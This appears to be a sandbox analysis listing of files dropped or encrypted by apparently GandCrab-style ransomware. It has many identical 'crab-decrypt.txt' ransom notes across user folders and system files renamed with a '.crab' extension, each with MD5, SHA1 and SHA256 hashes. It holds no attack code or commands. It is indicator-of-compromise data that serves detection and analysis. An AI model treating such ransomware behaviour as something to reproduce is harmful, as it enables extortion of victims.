c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\microsoft\ms project\14\crab-decrypt.txt 3.20 KB MD5: 2e9000662d1fb6a630239fe8ddd82d58
SHA1: b49255836e981cbd01b0b78691dbf6adc566b8a0
SHA256: c18f20d38ca72a4aff75afb404987261f5ee963c3ea506340616bd55dc654602
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\microsoft\ms project\14\1033\crab-decrypt.txt 3.20 KB MD5: 2e9000662d1fb6a630239fe8ddd82d58
SHA1: b49255836e981cbd01b0b78691dbf6adc566b8a0
SHA256: c18f20d38ca72a4aff75afb404987261f5ee963c3ea506340616bd55dc654602
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\microsoft\network\crab-decrypt.txt 3.20 KB MD5: 2e9000662d1fb6a630239fe8ddd82d58
SHA1: b49255836e981cbd01b0b78691dbf6adc566b8a0
SHA256: c18f20d38ca72a4aff75afb404987261f5ee963c3ea506340616bd55dc654602
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\microsoft\network\connections\crab-decrypt.txt 3.20 KB MD5: 2e9000662d1fb6a630239fe8ddd82d58
SHA1: b49255836e981cbd01b0b78691dbf6adc566b8a0
SHA256: c18f20d38ca72a4aff75afb404987261f5ee963c3ea506340616bd55dc654602
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\microsoft\network\connections\pbk\crab-decrypt.txt 3.20 KB MD5: 2e9000662d1fb6a630239fe8ddd82d58
SHA1: b49255836e981cbd01b0b78691dbf6adc566b8a0
SHA256: c18f20d38ca72a4aff75afb404987261f5ee963c3ea506340616bd55dc654602
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\microsoft\network\connections\pbk\_hiddenpbk\crab-decrypt.txt 3.20 KB MD5: 2e9000662d1fb6a630239fe8ddd82d58
SHA1: b49255836e981cbd01b0b78691dbf6adc566b8a0
SHA256: c18f20d38ca72a4aff75afb404987261f5ee963c3ea506340616bd55dc654602
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\microsoft\office\crab-decrypt.txt 3.20 KB MD5: 2e9000662d1fb6a630239fe8ddd82d58
SHA1: b49255836e981cbd01b0b78691dbf6adc566b8a0
SHA256: c18f20d38ca72a4aff75afb404987261f5ee963c3ea506340616bd55dc654602
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\microsoft\office\recent\crab-decrypt.txt 3.20 KB MD5: 2e9000662d1fb6a630239fe8ddd82d58
SHA1: b49255836e981cbd01b0b78691dbf6adc566b8a0
SHA256: c18f20d38ca72a4aff75afb404987261f5ee963c3ea506340616bd55dc654602
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\microsoft\outlook\crab-decrypt.txt 3.20 KB MD5: 2e9000662d1fb6a630239fe8ddd82d58
SHA1: b49255836e981cbd01b0b78691dbf6adc566b8a0
SHA256: c18f20d38ca72a4aff75afb404987261f5ee963c3ea506340616bd55dc654602
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\microsoft\powerpoint\crab-decrypt.txt 3.20 KB MD5: 2e9000662d1fb6a630239fe8ddd82d58
SHA1: b49255836e981cbd01b0b78691dbf6adc566b8a0
SHA256: c18f20d38ca72a4aff75afb404987261f5ee963c3ea506340616bd55dc654602
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\microsoft\proof\crab-decrypt.txt 3.20 KB MD5: 2e9000662d1fb6a630239fe8ddd82d58
SHA1: b49255836e981cbd01b0b78691dbf6adc566b8a0
SHA256: c18f20d38ca72a4aff75afb404987261f5ee963c3ea506340616bd55dc654602
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\microsoft\protect\crab-decrypt.txt 3.20 KB MD5: 2e9000662d1fb6a630239fe8ddd82d58
SHA1: b49255836e981cbd01b0b78691dbf6adc566b8a0
SHA256: c18f20d38ca72a4aff75afb404987261f5ee963c3ea506340616bd55dc654602
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\microsoft\protect\s-1-5-21-3111613574-2524581245-2586426736-500\crab-decrypt.txt 3.20 KB MD5: 2e9000662d1fb6a630239fe8ddd82d58
SHA1: b49255836e981cbd01b0b78691dbf6adc566b8a0
SHA256: c18f20d38ca72a4aff75afb404987261f5ee963c3ea506340616bd55dc654602
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\microsoft\protect\s-1-5-21-3388679973-3930757225-3770151564-1000\crab-decrypt.txt 3.20 KB MD5: 2e9000662d1fb6a630239fe8ddd82d58
SHA1: b49255836e981cbd01b0b78691dbf6adc566b8a0
SHA256: c18f20d38ca72a4aff75afb404987261f5ee963c3ea506340616bd55dc654602
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\microsoft\publisher\crab-decrypt.txt 3.20 KB MD5: 2e9000662d1fb6a630239fe8ddd82d58
SHA1: b49255836e981cbd01b0b78691dbf6adc566b8a0
SHA256: c18f20d38ca72a4aff75afb404987261f5ee963c3ea506340616bd55dc654602
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\microsoft\publisher building blocks\crab-decrypt.txt 3.20 KB MD5: 2e9000662d1fb6a630239fe8ddd82d58
SHA1: b49255836e981cbd01b0b78691dbf6adc566b8a0
SHA256: c18f20d38ca72a4aff75afb404987261f5ee963c3ea506340616bd55dc654602
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\microsoft\speech\crab-decrypt.txt 3.20 KB MD5: 2e9000662d1fb6a630239fe8ddd82d58
SHA1: b49255836e981cbd01b0b78691dbf6adc566b8a0
SHA256: c18f20d38ca72a4aff75afb404987261f5ee963c3ea506340616bd55dc654602
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\microsoft\systemcertificates\crab-decrypt.txt 3.20 KB MD5: 2e9000662d1fb6a630239fe8ddd82d58
SHA1: b49255836e981cbd01b0b78691dbf6adc566b8a0
SHA256: c18f20d38ca72a4aff75afb404987261f5ee963c3ea506340616bd55dc654602
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\microsoft\systemcertificates\my\crab-decrypt.txt 3.20 KB MD5: 2e9000662d1fb6a630239fe8ddd82d58
SHA1: b49255836e981cbd01b0b78691dbf6adc566b8a0
SHA256: c18f20d38ca72a4aff75afb404987261f5ee963c3ea506340616bd55dc654602
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\microsoft\systemcertificates\my\certificates\crab-decrypt.txt 3.20 KB MD5: 2e9000662d1fb6a630239fe8ddd82d58
SHA1: b49255836e981cbd01b0b78691dbf6adc566b8a0
SHA256: c18f20d38ca72a4aff75afb404987261f5ee963c3ea506340616bd55dc654602
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\microsoft\systemcertificates\my\crls\crab-decrypt.txt 3.20 KB MD5: 2e9000662d1fb6a630239fe8ddd82d58
SHA1: b49255836e981cbd01b0b78691dbf6adc566b8a0
SHA256: c18f20d38ca72a4aff75afb404987261f5ee963c3ea506340616bd55dc654602
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\microsoft\systemcertificates\my\ctls\crab-decrypt.txt 3.20 KB MD5: 2e9000662d1fb6a630239fe8ddd82d58
SHA1: b49255836e981cbd01b0b78691dbf6adc566b8a0
SHA256: c18f20d38ca72a4aff75afb404987261f5ee963c3ea506340616bd55dc654602
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\microsoft\templates\crab-decrypt.txt 3.20 KB MD5: 2e9000662d1fb6a630239fe8ddd82d58
SHA1: b49255836e981cbd01b0b78691dbf6adc566b8a0
SHA256: c18f20d38ca72a4aff75afb404987261f5ee963c3ea506340616bd55dc654602
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\microsoft\uproof\crab-decrypt.txt 3.20 KB MD5: 2e9000662d1fb6a630239fe8ddd82d58
SHA1: b49255836e981cbd01b0b78691dbf6adc566b8a0
SHA256: c18f20d38ca72a4aff75afb404987261f5ee963c3ea506340616bd55dc654602
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\microsoft\word\crab-decrypt.txt 3.20 KB MD5: 2e9000662d1fb6a630239fe8ddd82d58
SHA1: b49255836e981cbd01b0b78691dbf6adc566b8a0
SHA256: c18f20d38ca72a4aff75afb404987261f5ee963c3ea506340616bd55dc654602
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\microsoft\word\startup\crab-decrypt.txt 3.20 KB MD5: 2e9000662d1fb6a630239fe8ddd82d58
SHA1: b49255836e981cbd01b0b78691dbf6adc566b8a0
SHA256: c18f20d38ca72a4aff75afb404987261f5ee963c3ea506340616bd55dc654602
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\mozilla\crab-decrypt.txt 3.20 KB MD5: 2e9000662d1fb6a630239fe8ddd82d58
SHA1: b49255836e981cbd01b0b78691dbf6adc566b8a0
SHA256: c18f20d38ca72a4aff75afb404987261f5ee963c3ea506340616bd55dc654602
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\mozilla\extensions\crab-decrypt.txt 3.20 KB MD5: 2e9000662d1fb6a630239fe8ddd82d58
SHA1: b49255836e981cbd01b0b78691dbf6adc566b8a0
SHA256: c18f20d38ca72a4aff75afb404987261f5ee963c3ea506340616bd55dc654602
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\mozilla\firefox\crab-decrypt.txt 3.20 KB MD5: 2e9000662d1fb6a630239fe8ddd82d58
SHA1: b49255836e981cbd01b0b78691dbf6adc566b8a0
SHA256: c18f20d38ca72a4aff75afb404987261f5ee963c3ea506340616bd55dc654602
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\mozilla\firefox\crash reports\crab-decrypt.txt 3.20 KB MD5: 2e9000662d1fb6a630239fe8ddd82d58
SHA1: b49255836e981cbd01b0b78691dbf6adc566b8a0
SHA256: c18f20d38ca72a4aff75afb404987261f5ee963c3ea506340616bd55dc654602
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\mozilla\firefox\profiles\crab-decrypt.txt 3.20 KB MD5: 2e9000662d1fb6a630239fe8ddd82d58
SHA1: b49255836e981cbd01b0b78691dbf6adc566b8a0
SHA256: c18f20d38ca72a4aff75afb404987261f5ee963c3ea506340616bd55dc654602
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\mozilla\firefox\profiles\silmbjec.default\crab-decrypt.txt 3.20 KB MD5: 2e9000662d1fb6a630239fe8ddd82d58
SHA1: b49255836e981cbd01b0b78691dbf6adc566b8a0
SHA256: c18f20d38ca72a4aff75afb404987261f5ee963c3ea506340616bd55dc654602
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\mozilla\firefox\profiles\silmbjec.default\bookmarkbackups\crab-decrypt.txt 3.20 KB MD5: 2e9000662d1fb6a630239fe8ddd82d58
SHA1: b49255836e981cbd01b0b78691dbf6adc566b8a0
SHA256: c18f20d38ca72a4aff75afb404987261f5ee963c3ea506340616bd55dc654602
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\mozilla\firefox\profiles\silmbjec.default\indexeddb\crab-decrypt.txt 3.20 KB MD5: 2e9000662d1fb6a630239fe8ddd82d58
SHA1: b49255836e981cbd01b0b78691dbf6adc566b8a0
SHA256: c18f20d38ca72a4aff75afb404987261f5ee963c3ea506340616bd55dc654602
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\mozilla\firefox\profiles\silmbjec.default\indexeddb\moz-safe-about+home\crab-decrypt.txt 3.20 KB MD5: 2e9000662d1fb6a630239fe8ddd82d58
SHA1: b49255836e981cbd01b0b78691dbf6adc566b8a0
SHA256: c18f20d38ca72a4aff75afb404987261f5ee963c3ea506340616bd55dc654602
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\mozilla\firefox\profiles\silmbjec.default\indexeddb\moz-safe-about+home\idb\crab-decrypt.txt 3.20 KB MD5: 2e9000662d1fb6a630239fe8ddd82d58
SHA1: b49255836e981cbd01b0b78691dbf6adc566b8a0
SHA256: c18f20d38ca72a4aff75afb404987261f5ee963c3ea506340616bd55dc654602
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\mozilla\firefox\profiles\silmbjec.default\indexeddb\moz-safe-about+home\idb\818200132aebmoouht\crab-decrypt.txt 3.20 KB MD5: 2e9000662d1fb6a630239fe8ddd82d58
SHA1: b49255836e981cbd01b0b78691dbf6adc566b8a0
SHA256: c18f20d38ca72a4aff75afb404987261f5ee963c3ea506340616bd55dc654602
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\mozilla\firefox\profiles\silmbjec.default\minidumps\crab-decrypt.txt 3.20 KB MD5: 2e9000662d1fb6a630239fe8ddd82d58
SHA1: b49255836e981cbd01b0b78691dbf6adc566b8a0
SHA256: c18f20d38ca72a4aff75afb404987261f5ee963c3ea506340616bd55dc654602
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\mozilla\firefox\profiles\silmbjec.default\webapps\crab-decrypt.txt 3.20 KB MD5: 2e9000662d1fb6a630239fe8ddd82d58
SHA1: b49255836e981cbd01b0b78691dbf6adc566b8a0
SHA256: c18f20d38ca72a4aff75afb404987261f5ee963c3ea506340616bd55dc654602
False
c:\users\5p5nrgjn0js halpmcxz\contacts\crab-decrypt.txt 3.20 KB MD5: 2e9000662d1fb6a630239fe8ddd82d58
SHA1: b49255836e981cbd01b0b78691dbf6adc566b8a0
SHA256: c18f20d38ca72a4aff75afb404987261f5ee963c3ea506340616bd55dc654602
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\microsoft\windows\cookies\crab-decrypt.txt 3.20 KB MD5: 2e9000662d1fb6a630239fe8ddd82d58
SHA1: b49255836e981cbd01b0b78691dbf6adc566b8a0
SHA256: c18f20d38ca72a4aff75afb404987261f5ee963c3ea506340616bd55dc654602
False
c:\users\5p5nrgjn0js halpmcxz\desktop\uyrs 3lrpz\crab-decrypt.txt 3.20 KB MD5: 2e9000662d1fb6a630239fe8ddd82d58
SHA1: b49255836e981cbd01b0b78691dbf6adc566b8a0
SHA256: c18f20d38ca72a4aff75afb404987261f5ee963c3ea506340616bd55dc654602
False
c:\users\5p5nrgjn0js halpmcxz\desktop\uyrs 3lrpz\szfzfgtq8necac\crab-decrypt.txt 3.20 KB MD5: 2e9000662d1fb6a630239fe8ddd82d58
SHA1: b49255836e981cbd01b0b78691dbf6adc566b8a0
SHA256: c18f20d38ca72a4aff75afb404987261f5ee963c3ea506340616bd55dc654602
False
c:\users\5p5nrgjn0js halpmcxz\desktop\uyrs 3lrpz\szfzfgtq8necac\9o5pum0skr0vpqawoif\crab-decrypt.txt 3.20 KB MD5: 2e9000662d1fb6a630239fe8ddd82d58
SHA1: b49255836e981cbd01b0b78691dbf6adc566b8a0
SHA256: c18f20d38ca72a4aff75afb404987261f5ee963c3ea506340616bd55dc654602
False
c:\users\5p5nrgjn0js halpmcxz\desktop\uyrs 3lrpz\szfzfgtq8necac\9o5pum0skr0vpqawoif\py36c35uyq5zx0u1gb\crab-decrypt.txt 3.20 KB MD5: 2e9000662d1fb6a630239fe8ddd82d58
SHA1: b49255836e981cbd01b0b78691dbf6adc566b8a0
SHA256: c18f20d38ca72a4aff75afb404987261f5ee963c3ea506340616bd55dc654602
False
c:\users\5p5nrgjn0js halpmcxz\documents\crab-decrypt.txt 3.20 KB MD5: 2e9000662d1fb6a630239fe8ddd82d58
SHA1: b49255836e981cbd01b0b78691dbf6adc566b8a0
SHA256: c18f20d38ca72a4aff75afb404987261f5ee963c3ea506340616bd55dc654602
False
c:\users\5p5nrgjn0js halpmcxz\documents\5a6dq a\crab-decrypt.txt 3.20 KB MD5: 2e9000662d1fb6a630239fe8ddd82d58
SHA1: b49255836e981cbd01b0b78691dbf6adc566b8a0
SHA256: c18f20d38ca72a4aff75afb404987261f5ee963c3ea506340616bd55dc654602
False
c:\users\5p5nrgjn0js halpmcxz\music\crab-decrypt.txt 3.20 KB MD5: 2e9000662d1fb6a630239fe8ddd82d58
SHA1: b49255836e981cbd01b0b78691dbf6adc566b8a0
SHA256: c18f20d38ca72a4aff75afb404987261f5ee963c3ea506340616bd55dc654602
False
c:\users\5p5nrgjn0js halpmcxz\pictures\crab-decrypt.txt 3.20 KB MD5: 2e9000662d1fb6a630239fe8ddd82d58
SHA1: b49255836e981cbd01b0b78691dbf6adc566b8a0
SHA256: c18f20d38ca72a4aff75afb404987261f5ee963c3ea506340616bd55dc654602
False
c:\users\5p5nrgjn0js halpmcxz\documents\my shapes\crab-decrypt.txt 3.20 KB MD5: 2e9000662d1fb6a630239fe8ddd82d58
SHA1: b49255836e981cbd01b0b78691dbf6adc566b8a0
SHA256: c18f20d38ca72a4aff75afb404987261f5ee963c3ea506340616bd55dc654602
False
c:\users\5p5nrgjn0js halpmcxz\documents\my shapes\_private\crab-decrypt.txt 3.20 KB MD5: 2e9000662d1fb6a630239fe8ddd82d58
SHA1: b49255836e981cbd01b0b78691dbf6adc566b8a0
SHA256: c18f20d38ca72a4aff75afb404987261f5ee963c3ea506340616bd55dc654602
False
c:\users\5p5nrgjn0js halpmcxz\videos\crab-decrypt.txt 3.20 KB MD5: 2e9000662d1fb6a630239fe8ddd82d58
SHA1: b49255836e981cbd01b0b78691dbf6adc566b8a0
SHA256: c18f20d38ca72a4aff75afb404987261f5ee963c3ea506340616bd55dc654602
False
c:\users\5p5nrgjn0js halpmcxz\documents\outlook files\crab-decrypt.txt 3.20 KB MD5: 2e9000662d1fb6a630239fe8ddd82d58
SHA1: b49255836e981cbd01b0b78691dbf6adc566b8a0
SHA256: c18f20d38ca72a4aff75afb404987261f5ee963c3ea506340616bd55dc654602
False
c:\users\5p5nrgjn0js halpmcxz\downloads\crab-decrypt.txt 3.20 KB MD5: 2e9000662d1fb6a630239fe8ddd82d58
SHA1: b49255836e981cbd01b0b78691dbf6adc566b8a0
SHA256: c18f20d38ca72a4aff75afb404987261f5ee963c3ea506340616bd55dc654602
False
c:\users\5p5nrgjn0js halpmcxz\favorites\crab-decrypt.txt 3.20 KB MD5: 2e9000662d1fb6a630239fe8ddd82d58
SHA1: b49255836e981cbd01b0b78691dbf6adc566b8a0
SHA256: c18f20d38ca72a4aff75afb404987261f5ee963c3ea506340616bd55dc654602
False
c:\users\5p5nrgjn0js halpmcxz\favorites\links\crab-decrypt.txt 3.20 KB MD5: 2e9000662d1fb6a630239fe8ddd82d58
SHA1: b49255836e981cbd01b0b78691dbf6adc566b8a0
SHA256: c18f20d38ca72a4aff75afb404987261f5ee963c3ea506340616bd55dc654602
False
c:\users\5p5nrgjn0js halpmcxz\favorites\microsoft websites\crab-decrypt.txt 3.20 KB MD5: 2e9000662d1fb6a630239fe8ddd82d58
SHA1: b49255836e981cbd01b0b78691dbf6adc566b8a0
SHA256: c18f20d38ca72a4aff75afb404987261f5ee963c3ea506340616bd55dc654602
False
c:\users\5p5nrgjn0js halpmcxz\favorites\msn websites\crab-decrypt.txt 3.20 KB MD5: 2e9000662d1fb6a630239fe8ddd82d58
SHA1: b49255836e981cbd01b0b78691dbf6adc566b8a0
SHA256: c18f20d38ca72a4aff75afb404987261f5ee963c3ea506340616bd55dc654602
False
c:\users\5p5nrgjn0js halpmcxz\favorites\windows live\crab-decrypt.txt 3.20 KB MD5: 2e9000662d1fb6a630239fe8ddd82d58
SHA1: b49255836e981cbd01b0b78691dbf6adc566b8a0
SHA256: c18f20d38ca72a4aff75afb404987261f5ee963c3ea506340616bd55dc654602
False
c:\users\5p5nrgjn0js halpmcxz\links\crab-decrypt.txt 3.20 KB MD5: 2e9000662d1fb6a630239fe8ddd82d58
SHA1: b49255836e981cbd01b0b78691dbf6adc566b8a0
SHA256: c18f20d38ca72a4aff75afb404987261f5ee963c3ea506340616bd55dc654602
False
c:\users\5p5nrgjn0js halpmcxz\music\n6zv9eawsn-5\crab-decrypt.txt 3.20 KB MD5: 2e9000662d1fb6a630239fe8ddd82d58
SHA1: b49255836e981cbd01b0b78691dbf6adc566b8a0
SHA256: c18f20d38ca72a4aff75afb404987261f5ee963c3ea506340616bd55dc654602
False
c:\users\5p5nrgjn0js halpmcxz\music\n6zv9eawsn-5\in2oi15yt\crab-decrypt.txt 3.20 KB MD5: 2e9000662d1fb6a630239fe8ddd82d58
SHA1: b49255836e981cbd01b0b78691dbf6adc566b8a0
SHA256: c18f20d38ca72a4aff75afb404987261f5ee963c3ea506340616bd55dc654602
False
c:\users\5p5nrgjn0js halpmcxz\music\n6zv9eawsn-5\in2oi15yt\inl4q\crab-decrypt.txt 3.20 KB MD5: 2e9000662d1fb6a630239fe8ddd82d58
SHA1: b49255836e981cbd01b0b78691dbf6adc566b8a0
SHA256: c18f20d38ca72a4aff75afb404987261f5ee963c3ea506340616bd55dc654602
False
c:\users\5p5nrgjn0js halpmcxz\music\n6zv9eawsn-5\in2oi15yt\xr01\crab-decrypt.txt 3.20 KB MD5: 2e9000662d1fb6a630239fe8ddd82d58
SHA1: b49255836e981cbd01b0b78691dbf6adc566b8a0
SHA256: c18f20d38ca72a4aff75afb404987261f5ee963c3ea506340616bd55dc654602
False
c:\users\5p5nrgjn0js halpmcxz\music\n6zv9eawsn-5\in2oi15yt\xr01\24endo2rsr15sdp3\crab-decrypt.txt 3.20 KB MD5: 2e9000662d1fb6a630239fe8ddd82d58
SHA1: b49255836e981cbd01b0b78691dbf6adc566b8a0
SHA256: c18f20d38ca72a4aff75afb404987261f5ee963c3ea506340616bd55dc654602
False
c:\users\5p5nrgjn0js halpmcxz\music\n6zv9eawsn-5\in2oi15yt\xr01\24endo2rsr15sdp3\c06iavekw\crab-decrypt.txt 3.20 KB MD5: 2e9000662d1fb6a630239fe8ddd82d58
SHA1: b49255836e981cbd01b0b78691dbf6adc566b8a0
SHA256: c18f20d38ca72a4aff75afb404987261f5ee963c3ea506340616bd55dc654602
False
c:\users\5p5nrgjn0js halpmcxz\music\n6zv9eawsn-5\in2oi15yt\xr01\24endo2rsr15sdp3\c06iavekw\xxqwypul\crab-decrypt.txt 3.20 KB MD5: 2e9000662d1fb6a630239fe8ddd82d58
SHA1: b49255836e981cbd01b0b78691dbf6adc566b8a0
SHA256: c18f20d38ca72a4aff75afb404987261f5ee963c3ea506340616bd55dc654602
False
c:\users\5p5nrgjn0js halpmcxz\music\n6zv9eawsn-5\in2oi15yt\xr01\24endo2rsr15sdp3\c06iavekw\xxqwypul\1onm- n_x9gcx_j\crab-decrypt.txt 3.20 KB MD5: 2e9000662d1fb6a630239fe8ddd82d58
SHA1: b49255836e981cbd01b0b78691dbf6adc566b8a0
SHA256: c18f20d38ca72a4aff75afb404987261f5ee963c3ea506340616bd55dc654602
False
c:\users\5p5nrgjn0js halpmcxz\music\n6zv9eawsn-5\in2oi15yt\xr01\24endo2rsr15sdp3\vvfu7-c\crab-decrypt.txt 3.20 KB MD5: 2e9000662d1fb6a630239fe8ddd82d58
SHA1: b49255836e981cbd01b0b78691dbf6adc566b8a0
SHA256: c18f20d38ca72a4aff75afb404987261f5ee963c3ea506340616bd55dc654602
False
c:\users\5p5nrgjn0js halpmcxz\music\n6zv9eawsn-5\in2oi15yt\xr01\za4gzzm\crab-decrypt.txt 3.20 KB MD5: 2e9000662d1fb6a630239fe8ddd82d58
SHA1: b49255836e981cbd01b0b78691dbf6adc566b8a0
SHA256: c18f20d38ca72a4aff75afb404987261f5ee963c3ea506340616bd55dc654602
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\microsoft\windows\network shortcuts\crab-decrypt.txt 3.20 KB MD5: 2e9000662d1fb6a630239fe8ddd82d58
SHA1: b49255836e981cbd01b0b78691dbf6adc566b8a0
SHA256: c18f20d38ca72a4aff75afb404987261f5ee963c3ea506340616bd55dc654602
False
c:\users\5p5nrgjn0js halpmcxz\pictures\0wo6ya\crab-decrypt.txt 3.20 KB MD5: 2e9000662d1fb6a630239fe8ddd82d58
SHA1: b49255836e981cbd01b0b78691dbf6adc566b8a0
SHA256: c18f20d38ca72a4aff75afb404987261f5ee963c3ea506340616bd55dc654602
False
c:\users\5p5nrgjn0js halpmcxz\pictures\6gnobpugwk\crab-decrypt.txt 3.20 KB MD5: 2e9000662d1fb6a630239fe8ddd82d58
SHA1: b49255836e981cbd01b0b78691dbf6adc566b8a0
SHA256: c18f20d38ca72a4aff75afb404987261f5ee963c3ea506340616bd55dc654602
False
c:\users\5p5nrgjn0js halpmcxz\pictures\t7skzdy8\crab-decrypt.txt 3.20 KB MD5: 2e9000662d1fb6a630239fe8ddd82d58
SHA1: b49255836e981cbd01b0b78691dbf6adc566b8a0
SHA256: c18f20d38ca72a4aff75afb404987261f5ee963c3ea506340616bd55dc654602
False
c:\users\5p5nrgjn0js halpmcxz\pictures\t7skzdy8\8fz7awe3ry9cqpnp_co\crab-decrypt.txt 3.20 KB MD5: 2e9000662d1fb6a630239fe8ddd82d58
SHA1: b49255836e981cbd01b0b78691dbf6adc566b8a0
SHA256: c18f20d38ca72a4aff75afb404987261f5ee963c3ea506340616bd55dc654602
False
c:\users\5p5nrgjn0js halpmcxz\pictures\t7skzdy8\lm81\crab-decrypt.txt 3.20 KB MD5: 2e9000662d1fb6a630239fe8ddd82d58
SHA1: b49255836e981cbd01b0b78691dbf6adc566b8a0
SHA256: c18f20d38ca72a4aff75afb404987261f5ee963c3ea506340616bd55dc654602
False
c:\users\5p5nrgjn0js halpmcxz\pictures\t7skzdy8\lm81\i7bysmfgkjw8gx 1\crab-decrypt.txt 3.20 KB MD5: 2e9000662d1fb6a630239fe8ddd82d58
SHA1: b49255836e981cbd01b0b78691dbf6adc566b8a0
SHA256: c18f20d38ca72a4aff75afb404987261f5ee963c3ea506340616bd55dc654602
False
c:\users\5p5nrgjn0js halpmcxz\pictures\t7skzdy8\lm81\jluw_zq5f\crab-decrypt.txt 3.20 KB MD5: 2e9000662d1fb6a630239fe8ddd82d58
SHA1: b49255836e981cbd01b0b78691dbf6adc566b8a0
SHA256: c18f20d38ca72a4aff75afb404987261f5ee963c3ea506340616bd55dc654602
False
c:\recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\boot.sdi.crab 3.02 MB MD5: 2cec38c1d334b4aa2522512dcd24c18f
SHA1: f66ebde14fdd76d334395979dae499f3bedf9738
SHA256: c1d6cbc9fc70d1652e00b4106947b31129cd42c13c082e3d6b14a6ab64e5250c
False
c:\recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\winre.wim.crab 10.00 MB MD5: 5e4bbe6272835f45190a7b735c3091d1
SHA1: 7aaa8c3792fd12bc76c0780a0183143f338c046c
SHA256: f899185b99ebc772e9d71bb71f0bbbb100b13ec321f15423053faf18f4ab3d0e
False
c:\system volume information\spp\onlinemetadatacache\{00c95144-e912-40b3-a2d1-b8e12bc815d0}_ondisksnapshotprop.crab 2.91 KB MD5: 3e6edfac03332e7e2c56816ed1723540
SHA1: 61430c3943ecd8bc719c0387bf517acd4c01b173
SHA256: 8a14380163ac90d74004061ce53bd2de68d2cfd676fd991b1cef4666e0591c90
False
c:\system volume information\spp\onlinemetadatacache\{1ce95dd8-c40b-44fd-a9e6-d72d44ed8f39}_ondisksnapshotprop.crab 2.74 KB MD5: a54aebc3110f8ffff83a0a2d6d1b229b
SHA1: 9ae37167b6cd8f79364b3e102832bb9f3cece342
SHA256: aa675210533d518209259ccdcc59aa6afa8766994a1341b7f1afb5bc1f932e01
False
c:\system volume information\spp\onlinemetadatacache\{1e9425cc-553b-418f-b0c6-ad1ac9e1ba0c}_ondisksnapshotprop.crab 3.87 KB MD5: 54b21b8373e75f2e3501ce82ecc1d048
SHA1: 9c7b523224293d71c4c86c75440a39c4aca3f087
SHA256: 7823c383234279f526925ed6ef2968082a32cd77690fffe4932086608a4a716f
False
c:\system volume information\spp\onlinemetadatacache\{29088c66-de5f-456f-85c0-6e4156f94358}_ondisksnapshotprop.crab 3.73 KB MD5: 30c9bb57fb7a6213c4633e5749c39362
SHA1: a69fb77c07e33315452896cf0578da683b49d8e9
SHA256: f578af7e0ce9f9d7d3073b111e8e9c277f72184b4d2cdfb3b2adced41be3e04b
False
c:\system volume information\spp\onlinemetadatacache\{29296136-1f54-4fd8-b5c7-32fc96ef3c76}_ondisksnapshotprop.crab 4.05 KB MD5: 33d23a8886c98ddb35562f2248900046
SHA1: 3f9fd6d6c8238fb94a2ed74945c226431be943e4
SHA256: e00d87a0ad48502fc8c2d47a00d1ee11e879904e411eb0c2e56659ff0fbf42cf
False
c:\system volume information\spp\onlinemetadatacache\{4204ee1b-0338-4788-b199-d83e4955faf1}_ondisksnapshotprop.crab 3.62 KB MD5: 06476c9a1e2de80b2c578c911051685d
SHA1: e5682e1b0bb261f965d9509e961f67ffef424526
SHA256: c71eefff35c64678d4b1de8979b3e40243bddaa939a0cd024b5d8faac7a1ce13
False
c:\system volume information\spp\onlinemetadatacache\{425865b3-1a09-4be3-8a97-1baffda74ed0}_ondisksnapshotprop.crab 3.38 KB MD5: 5d561f7df3e609f73208f3251870a249
SHA1: 715c03deff23da67e219462586286f47925ca0f8
SHA256: 9927225620453bc2b3b85e3ed686833e55c87a4294b910ae48af6ce86b672546
False
c:\system volume information\spp\onlinemetadatacache\{51296d62-5aa5-412e-9a8f-abe77cd15e9e}_ondisksnapshotprop.crab 1.34 KB MD5: 683d852cef0ba6c4d6f207f592647b23
SHA1: b6e14166333709828bca34ccf5579ac844aab452
SHA256: b291686b0fd11017cb5093d800677c3b4e2bd6bb2e03553f1f5bec59845087ca
False
c:\system volume information\spp\onlinemetadatacache\{5ac56584-2304-47b9-b262-8d3164a52d9e}_ondisksnapshotprop.crab 3.07 KB MD5: e520ded96d789e49c6897d23fd5aca23
SHA1: 0028a3fe5944d4e26ae43079464bd2fe8b3a9c24
SHA256: b747b7e72eb5fd5e5de9d8db65669e86942b474b4be180220d4a49c544fb5ae2
False
